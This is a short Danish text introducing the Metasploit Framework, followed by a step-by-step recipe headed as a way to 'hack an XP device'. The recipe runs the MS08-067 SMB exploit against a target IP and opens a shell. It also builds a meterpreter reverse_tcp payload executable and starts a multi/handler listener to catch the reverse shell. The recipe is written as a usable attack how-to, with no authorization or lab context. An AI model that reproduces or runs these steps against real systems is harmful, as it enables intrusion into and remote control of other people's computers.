Metasploit Framework er et open source penetration værktøj som blev udviklet i 2003 af HD Moore , der anvendes til at udvikle og gennemføre exploit-kode mod en target maskine, Metasploit Framework har verdens største database over offentlige, testede exploits. Metasploit kan anvendes til at teste sårbarheder io computersystemer med henblik på at beskytte dem og på den anden side kan det også anvendes til at bryde ind i eksterne systemer. Metasploit er at finde på de mest udbredte penetrations tests software, så som kalilinux, blackbox og blackarch linux og startes næsten oftes fra en terminal med kommandoen, service metasploit start og herefter startes matesploit framework med kommandoen msfconsole.
Hack en XP enhed kunne se således ud.
- msfconsole
- search netapi
- use exploit/windows/smb/ms08_067_
netapi - set RHOST “DEN IP DU GÅR EFTER”
- set LHOST “DIN IP”
- exploit
- shell
- Terminal 1
- msfpayload windows/meterpreter/reverse_
tcp LHOST=“din ip” LPORT=8080 x > /root/Desktop/“navn du nu vil lave”.exe - Terminal 2
- msfconsole
- use multi/handler
- set LHOST “din ip”
- set LPORT 8080
- exploit
En rigtig god pdf at læse er – Metasploit – The Penetration Testers Guide